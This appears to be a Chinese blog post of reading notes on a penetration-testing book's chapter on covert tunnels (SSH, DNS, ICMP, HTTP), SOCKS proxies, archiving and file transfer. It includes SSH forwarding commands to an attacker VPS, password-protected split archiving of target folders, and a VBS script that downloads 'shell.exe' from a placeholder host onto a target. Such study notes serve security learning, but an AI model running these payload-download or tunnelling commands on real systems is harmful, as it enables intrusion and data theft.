《内网安全攻防:渗透测试实战指南》读书笔记:隐藏通信隧道技术

Posted 思源湖的鱼

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了《内网安全攻防:渗透测试实战指南》读书笔记:隐藏通信隧道技术相关的知识,希望对你有一定的参考价值。

目录

前言

本篇继续阅读学习《内网安全攻防:渗透测试实战指南》,是第三章隐藏通信隧道技术,详细介绍了IPv6隧道、ICMP隧道、HTTPS隧道、SSH隧道、DNS隧道等加密隧道的使用方法,并对常见的SOCKS代理工具及内网上传/下载方法进行了解说

相关知识之前也有过学习整理,参见:内网渗透系列:内网穿透(隧道)学习

一、基础知识

1、概述

网络隐藏通信隧道是与目标主机进行信息传输的主要工具

在大量TCP、UDP通信被防御系统拦截的情况下,DNS、ICMP等难以禁用的协议已经被攻击者利用,成为攻击者控制隧道的主要通道

常用隧道:

  • 网络层:IPv6隧道、ICMP隧道、GRE隧道
  • 传输层:TCP隧道、UDP隧道、常规端口转发
  • 应用层:SSH隧道、HTTP隧道、HTTPS隧道、DNS隧道

2、判断内网的连通性

判断方法如下:

//ICMP协议
ping www.baidu.com

//TCP协议
nc -zv 192.168.1.10 80

//HTTP协议
curl www.baidu.com:80
//curl的代理模式
curl -x proxy-ip:port www.baidu.com

//DNS协议
//windows下的nslookup
mslookup www.baidu.com vps-ip
//linux下的dig
dig @vps-ip www.baidu.com

二、网络层隧道技术

1、IPv6隧道

IPv6隧道可以将IPv4作为隧道载体,将IPv6报文整体封装在IPv4数据报文中

几种工具:

2、ICMP隧道

在一般的通信协议中,如果两台设备要进行通信,肯定需要开放端口,而在ICMP协议下就不需要

可参见:内网渗透系列:内网隧道之ICMP隧道

三、传输层隧道技术

主要是TCP隧道、UDP隧道和常规端口转发,大部分都会被拦截

工具可以参见:内网渗透系列:内网穿透(隧道)学习

四、应用层隧道技术

1、SSH隧道

几乎所有的Linux/UNIX服务器和网络设备都支持SSH协议,SSH协议是被允许通过防火墙和边界设备的,所以经常被攻击者利用

//本地转发
ssh -CfNg -L 1153(VPS端口):1.1.1.10(目标IP):3389(目标端口)
root@192.168.1.11(跳板机)

//远程转发
ssh -CfNg -R 3307(VPS端口):1.1.1.10(目标IP):3389(目标端口)
root@192.168.1.4

-L本地端口转发,-R远程端口转发,-D动态转发(SOCKS代理)**

防御:

  • IP白名单
  • ACL限制请求IP
  • 设置系统完全使用带外管理

2、HTTP/HTTPS隧道

reGeorg、meterpreter、tunna等,都很有名

3、DNS隧道

DNS是一个必不可少的服务,DNS报文本身具有穿透防火墙的能力。

从DNS协议的角度看,只是在一次次的查询某个特定的域名并得到解析结果,但其本质问题是,预期的返回结果应该是一个IP地址,而事实返回的是任意字符串,包括加密的C2指令。

DNS隧道本质是将其他协议封装在DNS协议中进行传输。

参见:内网渗透系列:内网隧道之DNS隧道

五、SOCKS代理

SOCKS是"SOCKetS"的缩写

  • SOCKS4只支持TCP协议
  • SOCKS5不仅支持TCP/UDP协议,还支持各种身份验证机制

SOCKS代理更底层,是在会话层;而HTTP代理是在应用层。因此SOCKS代理可以代理一切客户端的连接,而HTTP代理只能代理使用HTTP协议的客户端。由于更底层,不需要处理高级协议的细节,所以SOCKS代理更快。

SOCKET被称作"套接字",用于描述IP地址和端口,是一个通信链的句柄,可以用来实现不同计算机之间的通信,它的本质是编程接口(API),是对TCP/IP的封装。SOCKS是一个代理协议,目前最新版本为SOCKS5,所谓代理就是,你可以通过它的去间接的访问网络,相当于一个中转站。区别:SOCKET是一个API,一个工具,让你建立网络连接用的。SOCKS是协议,是一组数据结构。

目前VPN隧道协议主要有4种:点到点隧道协议PPTP、第二层隧道协议L2TP、网络层隧道协议IPSec以及SOCKS v5协议。其中,PPTP和L2TP工作在数据链路层,IPSec工作在网络层,SOCKS v5工作在会话层。

e.g. EarthWorm(ew、新版本Termite)、reGeorg、sSocks、SocksCap64(SSTap)、Proxifier、ProxyChains

六、压缩数据

1、rar.exe

将E:\\webs\\目录下的所有内容打包为1.rar放入E:\\webs\\目录下

rar.exe a -k -r -s -m3 E:\\webs\\1.rar E:\\webs\\

将E:\\webs\\1.rar解压到当前根目录下

rar.exe e E:\\webs\\1.rar

分卷压缩E盘API目录下的所有文件及文件夹,设置每个分卷为20M

rar.exe a -m0 -r -v20m E:\\test.rar E:\\API

将E:\\test.part01.rar解压到E盘的x1目录下

rar.exe x E:\\test.part01.rar E:\\x1

2、7-zip

将E:\\webs\\目录下的所有内容打包为1.7z放入E:\\webs\\目录下

7z.exe a -k -r -p12345 E:\\webs\\1.7z E:\\webs\\

将E:\\webs\\1.7z解压到当前根目录下

7z.exe e -p12345 E:\\webs\\1.7z

分卷压缩E盘API目录下的所有文件及文件夹,设置每个分卷为20M

7z.exe -r -vlm -padmin a E:\\test.7z E:\\API

将E:\\test.part01.7z解压到E盘的x1目录下

7z.exe x -padmin E:\\test.7z.001 -oE:\\x1

七、上传和下载

1、VBS

执行下面命令即可在目标主机上下载shell.exe文件

Cscript download.vbs

download.vbs代码:

Set Post=CreateObject("Msxml2.XMLHTTP")
Set shell = CreateObject("Wscript.Shell")
post.Open "GET","http://IP/shell.exe",0
post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(post.responseBody)
aGet.SaveToFile "C:\\test\\shell.exe",2

2、Debug上传

先将需要上传的EXE文件转换为十六进制HEX的形式,再通过echo命令将HEX代码写人文件,最后利用Debug功能将HEX代码编译并还原成EXE文件

在KaliLlnux中,exe2bat.exe工具位于/usr/share/windows-binaries目录,执行

wine exe2bat.exe ew.exe ew.txt

将ew.exe转换为ew.txt

然后,利用目标服务器的Debug功能将HEX代码还原为EXE文件
再使用echo命令将ew.txt里面的代码复制到目标系统的命令行环境中

3、其他

还可以用以下这些上传文件:

  • Nishang:利用Nishang将上传的EXE文件转换为十六进制的形式,然后使用echo命令访问目标服务器,最后使用Download_Execute脚本下载文本文件并将其转换为EXE文件
  • bitsadmm:推荐在Windows7和Windows8主机上使用,注意它不支持HTTPS和FTP协议,也不支持WindowsXP/Sever2003及以前的版本
  • PowerShell下载

结语

本章主要是隐匿通信隧道,由于这部分知识之前有过学习,故此处就不详细记录了,具体可见博客其他相关文章

以上是关于《内网安全攻防:渗透测试实战指南》读书笔记:隐藏通信隧道技术的主要内容,如果未能解决你的问题,请参考以下文章

《内网安全攻防:渗透测试实战指南》读书笔记:内网渗透测试基础

《内网安全攻防:渗透测试实战指南》读书笔记:内网信息收集

《内网安全攻防:渗透测试实战指南》读书笔记:内网信息收集

《内网安全攻防:渗透测试实战指南》读书笔记:跨域攻击分析及防御

《内网安全攻防:渗透测试实战指南》读书笔记:跨域攻击分析及防御

《内网安全攻防:渗透测试实战指南》读书笔记:跨域攻击分析及防御